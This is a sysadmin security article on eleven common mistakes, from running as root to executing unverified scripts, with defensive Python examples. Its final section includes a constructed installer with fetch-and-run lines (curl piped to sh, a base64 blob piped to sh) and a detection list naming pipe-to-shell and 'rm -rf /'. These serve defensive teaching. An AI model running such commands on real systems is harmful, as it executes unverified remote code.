Jason Parms

Common Mistakes by System Admins
System administrators are responsible for keeping an organization's computers running and for the uninterrupted operation of the systems that serve the business. An administrator who understands the security weaknesses of the systems they manage, and what a failure of those systems would mean for the business, is a real asset to any organization. In the course of their work, however, administrators make some routine mistakes that weaken a company's security. This article covers a few of those simple mistakes and the risk each one creates.

#1 Running scripts with root privileges:

One of the essential concepts of security is confining users to just the privileges they require. The same principle can and should be applied to the applications running on your systems: give each application only the privileges it needs.

One simple way to apply this is to avoid running applications as root at any point. An application that runs with root privilege controls the whole server, so an attacker who compromises it can execute any task, disable most of your other security controls, and read or alter any data. Any program may contain bugs, and a bug in a program running as root lets untrusted input or untrusted code act as root. If an application needs root for a single step, such as binding a port below 1024 or opening a protected log file, it should perform that step and then drop to an unprivileged user before it touches any untrusted input.
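The pattern described above, written out as an added example (this is not code from the original article): do the one privileged step as root, then give up root permanently before handling any client. It assumes a Linux host and a local unprivileged account named `app-svc`, which is a hypothetical name.

```python
#!/usr/bin/env python3
"""Bind a privileged port as root, then drop to an unprivileged user for good."""
import os
import pwd
import socket

SERVICE_USER = "app-svc"   # assumption: an unprivileged account created for this service
PRIVILEGED_PORT = 80       # ports below 1024 need root (or CAP_NET_BIND_SERVICE) to bind


def target_ids(user):
    """Look up the uid and gid the process should run as."""
    pw = pwd.getpwnam(user)
    return pw.pw_uid, pw.pw_gid


def drop_privileges(user):
    """Permanently give up root: supplementary groups first, then gid, then uid.

    The order matters: once the uid is unprivileged, setgroups/setgid would fail.
    Returns the (uid, gid) the process ends up with.
    """
    uid, gid = target_ids(user)
    if uid == 0:
        raise ValueError("refusing to 'drop' to uid 0")
    if os.geteuid() != 0:
        # Nothing to drop: the process was started unprivileged (the preferred case).
        return os.getuid(), os.getgid()
    os.setgroups([])   # clear supplementary groups inherited from root
    os.setgid(gid)     # sets real, effective and saved gid
    os.setuid(uid)     # sets real, effective and saved uid: there is no way back
    # Verify the drop is irreversible; if root can be regained, fail closed.
    try:
        os.setuid(0)
    except PermissionError:
        pass
    else:
        raise RuntimeError("privilege drop failed: setuid(0) still succeeds")
    return os.getuid(), os.getgid()


def bind_listener(port):
    """Open the privileged resource (a low port) before privileges are dropped."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("0.0.0.0", port))
    sock.listen(16)
    return sock


def main():
    # When run without root (for testing) fall back to an unprivileged port.
    port = PRIVILEGED_PORT if os.geteuid() == 0 else 8080
    sock = bind_listener(port)
    uid, gid = drop_privileges(SERVICE_USER)
    # From here on everything that sees untrusted input runs as uid/gid, not root.
    print(f"listening on :{port} as uid={uid} gid={gid}")
    conn, _peer = sock.accept()
    conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: 2\r\n\r\nok")
    conn.close()


if __name__ == "__main__":
    main()
```

The verification step is the part most people leave out: if `setuid(0)` still succeeds after the drop, only the effective uid changed and an attacker who gets code execution can simply switch back. The same idea applies to services started by systemd, where `User=` and `AmbientCapabilities=CAP_NET_BIND_SERVICE` avoid starting as root at all.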

#2 Password reuse across systems:

Servers are often set up with weak administrator passwords, or with the same password as other machines on the network. Like many people, system administrators reuse passwords across systems. Weak and recycled passwords are a common cause of breaches: once an attacker obtains one of them, they have ready access to every system where it was reused. All the attacker needs to do is crack or phish one system to reach the others the company uses.

A weak reused password can be guessed by a brute-force attack, and when several machines share it the problem is compounded: one guess opens all of them. Instead of setting the same root password on different machines, administrators should authenticate with SSH keys.

The administrator generates a key pair on their workstation; the private key stays there, protected by a passphrase, and the matching public key is added to the authorized_keys file on each server. The administrator can then log in to every machine assigned to them, while an attacker moving laterally through the network cannot log in without the private key, and there is no password on the wire to capture or reuse. Once key-based login works, password authentication and direct root login should be disabled in sshd_config; otherwise the weak passwords remain a way in.
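An added example (not from the original article) that audits an sshd_config for the settings this section depends on, with a constructed weak configuration beside a hardened one. It follows sshd's own rules: keywords are case-insensitive, the first value seen for a keyword wins, and the defaults below are OpenSSH's when a keyword is absent. Settings inside a `Match` block are conditional, so only the global section is audited.

```python
"""Audit the global section of an sshd_config for password-based access."""

# What a hardened server must say (keyword -> required value).
REQUIRED = {
    "passwordauthentication": "no",
    "permitrootlogin": "no",        # log in as a named account and use sudo instead
    "pubkeyauthentication": "yes",
}

# OpenSSH defaults that apply when the keyword is not set at all.
DEFAULTS = {
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "pubkeyauthentication": "yes",
}


def parse_sshd_config(text):
    """Return the effective global keyword values; sshd uses the first value it sees."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments, including trailing ones
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break   # everything after Match is conditional; audit the global section only
        value = parts[1].strip().lower() if len(parts) > 1 else ""
        settings.setdefault(key, value)       # first occurrence wins, later ones are ignored
    return settings


def audit(text):
    """Return [(keyword, effective value, required value)] for every failing setting."""
    settings = parse_sshd_config(text)
    findings = []
    for key, want in REQUIRED.items():
        have = settings.get(key, DEFAULTS[key])
        if have != want:
            findings.append((key, have, want))
    return findings


# Constructed configs for illustration.
WEAK_CONFIG = """\
# Fresh install plus a "temporary" root login that never got removed
Port 22
PermitRootLogin yes
#PasswordAuthentication no
"""

HARDENED_CONFIG = """\
Port 22
PubkeyAuthentication yes
PasswordAuthentication no
PermitRootLogin no
PasswordAuthentication yes   # later duplicate: ignored, the first value wins
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(cfg) or "OK")
```

The weak file shows the two classic traps: the hardening line is commented out (so the default `yes` applies), and the duplicate-keyword rule means a later `PasswordAuthentication no` appended to a file that already says `yes` does nothing. Run `sshd -T` on the host to see the effective values rather than trusting the file.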

#3 Administrator controls and shared accounts:

Administrator accounts carry high privileges; they can change critical configuration and data. They are frequently used with little or no tracking, and more than one administrator often uses the same account by simply sharing its password. When an administrator leaves the organization, the password often stays unchanged. Because these passwords are not tied to particular people, the accounts can be used to do essentially anything with little chance of attribution, and they are frequently the route to unauthorized access.

Each administrator should have a personal, named account with elevated rights granted through sudo or an equivalent mechanism, so that every privileged action is attributable to one person. Passwords on shared service and administrator accounts should be rotated periodically, and reset immediately whenever an administrator leaves the company.

#4 Forgetting to renew SSL certificates:

SSL/TLS certificates have a validity period, from the issue date to the expiry date. Once a certificate has expired, browsers no longer trust the site's identity: visitors see a warning that the connection is not secure, because the certificate is expired or otherwise invalid, and they have no assurance that they are talking to the real site rather than to an attacker impersonating it.


Attackers can take advantage of such a site: once users have been trained to click through certificate warnings, a man-in-the-middle can present a certificate of their own and capture customer data for malicious use. Administrators generally obtain an SSL certificate but often forget to renew it, and customers become victims on such sites. Track the expiry date of every certificate, alert well before it is reached, and automate renewal wherever the issuer supports it.
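An added example (not from the original article) that turns "track the expiry date" into a check you can put in cron. The `notAfter` string is constructed in the format Python's `ssl` module returns from `getpeercert()`; `check_remote()` performs a real TLS handshake and is for interactive use. The 30-day renewal window is an assumption.

```python
"""Report how many days a certificate has left and whether it needs renewing."""
import socket
import ssl
import time

RENEW_WITHIN_DAYS = 30   # assumption: renew early enough that a failed renewal gets noticed


def days_until_expiry(not_after, now_ts=None):
    """Whole days until notAfter (e.g. 'Dec 31 23:59:59 2025 GMT'); negative once expired."""
    expires = ssl.cert_time_to_seconds(not_after)   # interprets the string as UTC
    now_ts = time.time() if now_ts is None else now_ts
    return int((expires - now_ts) // 86400)


def renewal_status(not_after, now_ts=None):
    """Classify a certificate as OK, RENEW or EXPIRED."""
    days = days_until_expiry(not_after, now_ts)
    if days < 0:
        return "EXPIRED"
    if days <= RENEW_WITHIN_DAYS:
        return "RENEW"
    return "OK"


def check_remote(host, port=443):
    """Fetch the leaf certificate from a live server and classify it."""
    ctx = ssl.create_default_context()   # verifies chain, hostname and validity period
    try:
        with socket.create_connection((host, port), timeout=10) as tcp:
            with ctx.wrap_socket(tcp, server_hostname=host) as tls:
                cert = tls.getpeercert()
    except ssl.SSLCertVerificationError as exc:
        # An expired or otherwise untrusted certificate fails verification before
        # we can read it; this is the same failure the users' browsers report.
        return "INVALID", str(exc)
    return renewal_status(cert["notAfter"]), cert["notAfter"]


if __name__ == "__main__":
    import sys
    for host in sys.argv[1:]:
        status, detail = check_remote(host)
        print(f"{host}: {status} ({detail})")
```

Because `create_default_context()` verifies the certificate, an already-expired one shows up as `INVALID` rather than as a negative day count; the day count is for catching the problem before that point.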

#5 Failing to monitor log files:

Maintaining system logs, especially on a multi-user or networked system, is an important part of a system administrator's job. Log files are indispensable for troubleshooting, and they let administrators see what is happening on their hosts and in their network, including failed logins, use of privileged commands and unexpected service restarts.

An administrator should know which logs exist, when they are written and what information they contain. To spare the administrator from reading every log line by hand, use a log analyzer or the audit tools built into the system: they read the log files and report summaries and statistics in various forms, and the useful ones raise an alert when a pattern such as repeated failed logins from one address appears.
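A small version of that detection, as an added example that is not from the original article: it reads traditional syslog-style sshd lines (the sample below is constructed, with TEST-NET addresses), counts failed logins per source address in a sliding window, and also flags a successful login that follows a burst of failures from the same address, which is the pattern a successful brute force leaves behind. The threshold and window values are assumptions to tune for your environment.

```python
"""Flag SSH brute-force attempts and suspicious successes in auth.log lines."""
import re
from collections import defaultdict, deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed password|Accepted \w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)
THRESHOLD = 5        # assumption: this many failures from one address...
WINDOW = 120         # ...within this many seconds is a brute-force attempt
SUCCESS_AFTER = 3    # a success after this many recent failures deserves a look


def parse(line, year=None):
    """Return a dict for sshd login events, None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # The traditional syslog timestamp carries no year; assume the current one.
    # (Wrong for logs spanning New Year; prefer journald/RFC 5424 timestamps.)
    year = datetime.now().year if year is None else year
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "ok": m["result"].startswith("Accepted"),
            "user": m["user"], "ip": m["ip"]}


def _prune(q, now):
    """Drop failure timestamps that have aged out of the window."""
    while q and (now - q[0]).total_seconds() > WINDOW:
        q.popleft()


def detect(lines):
    """Return alerts as (kind, source ip, detail) tuples, in log order."""
    alerts = []
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    flagged = set()               # addresses already reported for brute force
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        q = recent[ev["ip"]]
        _prune(q, ev["ts"])
        if ev["ok"]:
            if len(q) >= SUCCESS_AFTER:
                alerts.append(("success-after-failures", ev["ip"], ev["user"]))
                q.clear()
            continue
        q.append(ev["ts"])
        if len(q) >= THRESHOLD and ev["ip"] not in flagged:
            flagged.add(ev["ip"])
            alerts.append(("brute-force", ev["ip"], f"{len(q)} failures in {WINDOW}s"))
    return alerts


# Constructed sample, not a real log.
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:12 web1 sshd[2311]: Failed password for invalid user admin from 203.0.113.5 port 51422 ssh2
Mar  3 10:01:14 web1 sshd[2313]: Failed password for root from 203.0.113.5 port 51430 ssh2
Mar  3 10:01:17 web1 sshd[2315]: Failed password for root from 203.0.113.5 port 51436 ssh2
Mar  3 10:01:19 web1 sshd[2317]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=203.0.113.5
Mar  3 10:01:20 web1 sshd[2317]: Failed password for root from 203.0.113.5 port 51440 ssh2
Mar  3 10:01:23 web1 sshd[2319]: Failed password for root from 203.0.113.5 port 51444 ssh2
Mar  3 10:01:40 web1 sshd[2321]: Accepted password for root from 203.0.113.5 port 51450 ssh2
Mar  3 10:02:00 web1 sshd[2330]: Failed password for jparms from 198.51.100.7 port 40010 ssh2
Mar  3 10:02:05 web1 sshd[2332]: Accepted publickey for jparms from 198.51.100.7 port 40012 ssh2: ED25519 SHA256:constructed
Mar  3 10:05:01 web1 sshd[2400]: Accepted publickey for jparms from 192.0.2.10 port 40022 ssh2: ED25519 SHA256:constructed
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_AUTH_LOG.splitlines()):
        print(*alert)
```

On the sample, 203.0.113.5 is reported for brute force at its fifth failure and again when a password login as root succeeds seconds later; the single typo from 198.51.100.7 followed by a key login is ignored. The second alert is the one that matters: it says the weak root password from mistake #2 has just been found.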

#6 Storing passwords in plain text:

Storing a password in plain text is a frequent cause of system compromise. A password kept in a plain-text configuration file is a risk in itself, because its protection is now only as good as the file's permissions and every backup, log and repository that file ends up in.

A plain-text password in a configuration file lets anyone who can read the file reach the password-protected resource. Good password management requires that no password be stored in plain text. Use a well-known password manager or secrets store to keep system and user credentials encrypted with specified access control, and where an application must read a credential from a file, keep that file owned by the service account with mode 0600 and out of version control.
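An added example (not from the original article) of the file-based fallback done carefully: a constructed weak config with the password inline, the corrected config that only names a secret file, and a loader that refuses to read that file unless it is a regular file owned by the current user and not readable by anyone else. The `[db]` section and `DB_PASSWORD` variable names are assumptions.

```python
"""Load a credential from the environment or from a 0600 file, never from the config."""
import configparser
import os
import stat
import tempfile


def write_secret(path, value):
    """Create the secret file with mode 0600 from the start (O_EXCL: never overwrite)."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(value + "\n")


def load_secret(path):
    """Read a credential only if the file is protected from other users."""
    st = os.lstat(path)                      # lstat: do not follow a planted symlink
    if stat.S_ISLNK(st.st_mode):
        raise PermissionError(f"{path}: refusing to follow a symlink")
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError(f"{path}: not a regular file")
    if st.st_uid != os.geteuid():
        raise PermissionError(f"{path}: owned by uid {st.st_uid}, not by us")
    mode = stat.S_IMODE(st.st_mode)
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        raise PermissionError(f"{path}: mode {oct(mode)} is accessible to others; chmod 600 it")
    with open(path, encoding="utf-8") as fh:
        return fh.read().strip()


def db_password(config_text, environ=None):
    """Resolve the DB password: env var first, then a protected file; never inline."""
    environ = os.environ if environ is None else environ
    cp = configparser.ConfigParser()
    cp.read_string(config_text)
    db = cp["db"]
    if "password" in db:
        raise ValueError("config stores the password inline; use DB_PASSWORD or password_file")
    if environ.get("DB_PASSWORD"):
        return environ["DB_PASSWORD"]
    return load_secret(db["password_file"])


# Constructed configs for illustration.
WEAK_CONFIG = "[db]\nhost = db1\nuser = app\npassword = hunter2\n"
SAFE_CONFIG = "[db]\nhost = db1\nuser = app\npassword_file = /etc/app/db_password\n"


def demo():
    """Show a world-readable secret file being rejected and a 0600 one accepted."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "db_password")
        write_secret(path, "correct horse battery staple")
        os.chmod(path, 0o644)            # the common mistake: readable by every local user
        try:
            load_secret(path)
            rejected = False
        except PermissionError:
            rejected = True
        os.chmod(path, 0o600)
        return rejected, load_secret(path)


if __name__ == "__main__":
    print(demo())
```

The ownership and symlink checks matter as much as the mode: a world-writable directory lets another local user replace the secret file with a link to one of their own, and a file owned by someone else was not written by your deployment.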

#7 Credentials in bug reports:

When people report problems with systems by email or through bug tracking software, they sometimes include their usernames and passwords in the description of the issue. That is a security problem: issue reports are accessible to far more people than the system administrator alone, and they are retained for years.

Additionally, the bug tracking software itself can be compromised at any time. When a bug is reported, the team should review it, strip any credentials from the report and have them reset, and forward it to the relevant department, prioritizing bug resolution so that things are done in the right order.

#8 Not keeping systems up to date:

Some administrators are negligent about applying security updates as soon as they are available. Whenever a security patch is released, the administrator should examine the vulnerability advisory and its impact on their systems and environment.

The administrator should verify whether a system needs the particular patch and install it if it does. Firmware and hardware should be patched as well as software, and each security hole should be understood in the context of the system's configuration, since a vulnerable component that is exposed on one system may be unreachable on another.

#9 Superuser tasks:

An administrator should not give ordinary users the ability to run privileged commands. Whoever logs in as root has complete control over the system. This is risky, especially where private information is stored: an attacker who takes over that session can perform any task to get at the stored data.

If there are no superuser tasks to perform, there is no need to log in as root. Administrators should log in with their personal accounts and use sudo (superuser do) for the specific commands that need it, which also leaves a log entry for each privileged command.

#10 Not terminating dormant accounts:

Unused accounts are a liability. Attackers target dormant accounts and exploit them, especially when they still have default passwords and nobody is watching them for unexpected activity. The administrator should disable unused accounts with the account management tools rather than by hand-editing the shadow file: lock the password with passwd -l or usermod -L and, because a locked password alone still permits SSH key logins, also expire the account with chage -E. Locking rather than deleting keeps file ownership and audit history intact.
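An added example (not from the original article) of finding those accounts: it reads passwd- and shadow-format lines together with a last-login table and lists unlocked interactive accounts unused for 90 days, then emits the lock commands. All of the input below is constructed; on a real host the data comes from /etc/passwd, /etc/shadow (readable as root) and `lastlog` or `last`. The 90-day threshold and the uid 1000 cutoff for human accounts are assumptions.

```python
"""List dormant interactive accounts and the commands that disable them."""
DORMANT_DAYS = 90
TODAY = 20000   # constructed "today" in days since the epoch, the unit shadow(5) uses
NOLOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false")

# Constructed sample data, not from a real host.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jparms:x:1000:1000:Jason:/home/jparms:/bin/bash
contractor:x:1001:1001::/home/contractor:/bin/bash
exstaff:x:1002:1002::/home/exstaff:/bin/bash
intern:x:1003:1003::/home/intern:/bin/bash
svcbackup:x:1004:1004::/var/lib/backup:/usr/sbin/nologin
"""
SHADOW = """\
root:$6$constructed$hash0:19900:0:99999:7:::
jparms:$6$constructed$hash1:19950:0:99999:7:::
contractor:$6$constructed$hash2:19500:0:99999:7:::
exstaff:!$6$constructed$hash3:19300:0:99999:7:::
intern:$6$constructed$hash4:19800:0:99999:7:::
svcbackup:*:19000:0:99999:7:::
"""
# name -> last login in days since the epoch; an absent name means never logged in
LAST_LOGIN = {"root": 19999, "jparms": 19998, "contractor": 19700, "exstaff": 19310}


def dormant_accounts(passwd_text, shadow_text, last_login, today=TODAY):
    """Return [(name, reason)] for unlocked interactive accounts idle > DORMANT_DAYS."""
    shadow = {}
    for line in shadow_text.splitlines():
        f = line.split(":")
        shadow[f[0]] = {"hash": f[1], "expire": int(f[7]) if f[7] else None}
    found = []
    for line in passwd_text.splitlines():
        name, _, uid, _, _, _, shell = line.split(":")
        if int(uid) < 1000 or shell in NOLOGIN_SHELLS:
            continue   # system/service accounts: no interactive login to go dormant
        entry = shadow.get(name)
        if entry is None or entry["hash"].startswith(("!", "*")):
            continue   # password already locked
        if entry["expire"] and entry["expire"] <= today:
            continue   # account already expired
        last = last_login.get(name)
        if last is None:
            found.append((name, "never logged in"))
        elif today - last > DORMANT_DAYS:
            found.append((name, f"last login {today - last} days ago"))
    return found


def lock_commands(accounts):
    """Lock the password AND expire the account; -E 1 is 1970-01-02, safely in the past."""
    cmds = []
    for name, _reason in accounts:
        cmds.append(f"passwd -l {name}")
        cmds.append(f"chage -E 1 {name}")
    return cmds


if __name__ == "__main__":
    found = dormant_accounts(PASSWD, SHADOW, LAST_LOGIN)
    for name, reason in found:
        print(f"{name}: {reason}")
    print("\n".join(lock_commands(found)))
```

Review the list before running the commands; an account that only ever logs in with a key will show no entry in `lastlog` on some systems, so cross-check against the sshd log from mistake #5 before concluding it is unused.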

#11 Running unknown scripts:

Even if the administrator trusts a source, they should never assume that a script downloaded over the internet is safe. Before running it, the administrator should download it to a file, verify it against a checksum or signature that the author published through a separate channel, and read it to confirm that the commands it executes are not malicious. Piping a download straight into a shell skips every one of these checks.
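An added example (not from the original article) of that download-verify-read-then-run sequence. The URL, the expected checksum and the sample installer script are constructed; the triage patterns are a crude first pass to draw the reviewer's eye, not a substitute for reading the script. The checksum compared against must come from somewhere other than the page that served the script, or the comparison proves nothing.

```python
"""Fetch a script, verify its checksum, flag obviously dangerous lines, save for review."""
import hashlib
import hmac
import os
import re
import tempfile
import urllib.request

# Name -> pattern; order determines the order of findings on a line.
SUSPICIOUS = [
    ("pipe-to-shell", re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    ("base64-decode", re.compile(r"\bbase64\s+(?:-d|--decode)\b")),
    ("eval", re.compile(r"\beval\b")),
    ("recursive-delete-root", re.compile(r"\brm\s+-rf\s+/\*?(?:\s|$)")),
]


def sha256_of(data):
    return hashlib.sha256(data).hexdigest()


def verify_checksum(data, expected_hex):
    """Constant-time comparison against the checksum published out of band."""
    return hmac.compare_digest(sha256_of(data), expected_hex.strip().lower())


def suspicious_lines(text):
    """Return [(line number, pattern name)] for lines that deserve a close look."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in SUSPICIOUS:
            if pattern.search(line):
                findings.append((lineno, name))
    return findings


def fetch_and_verify(url, expected_sha256):
    """Download to a private temp file only if the checksum matches; never execute."""
    with urllib.request.urlopen(url, timeout=30) as resp:
        data = resp.read()
    if not verify_checksum(data, expected_sha256):
        raise RuntimeError(f"{url}: checksum mismatch, not saving")
    fd, path = tempfile.mkstemp(suffix=".sh")
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    os.chmod(path, 0o700)
    return path


# Constructed installer used for the triage demonstration.
SAMPLE_SCRIPT = """\
#!/bin/sh
set -e
echo "Installing example-tool"
curl -fsSL https://example.com/stage2.sh | sh
echo aGVsbG8K | base64 -d | sh
cp example-tool /usr/local/bin/
"""

if __name__ == "__main__":
    import sys
    url, expected = sys.argv[1], sys.argv[2]   # hypothetical: ./verify.py URL SHA256
    path = fetch_and_verify(url, expected)
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, why in suspicious_lines(fh.read()):
            print(f"{path}:{lineno}: {why}")
    print(f"saved to {path}; read it, then run it explicitly with: sh {path}")
```

The two flagged lines in the sample are the real lesson: a script you verified can still fetch a second stage you never verified, and a base64 blob piped into a shell is the usual way to hide one. A checksum tells you the file is the one the author published; only reading it tells you what it does.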

Conclusion:

As the internet and information infrastructures become larger and more complex, it has become critical for system administrators to keep their systems up and running at all times. System administrators need to stay current on the systems and networks they manage. Attackers are constantly developing new and more sophisticated techniques, so it is essential to examine each system and make it strong enough to withstand intrusion and data breach.
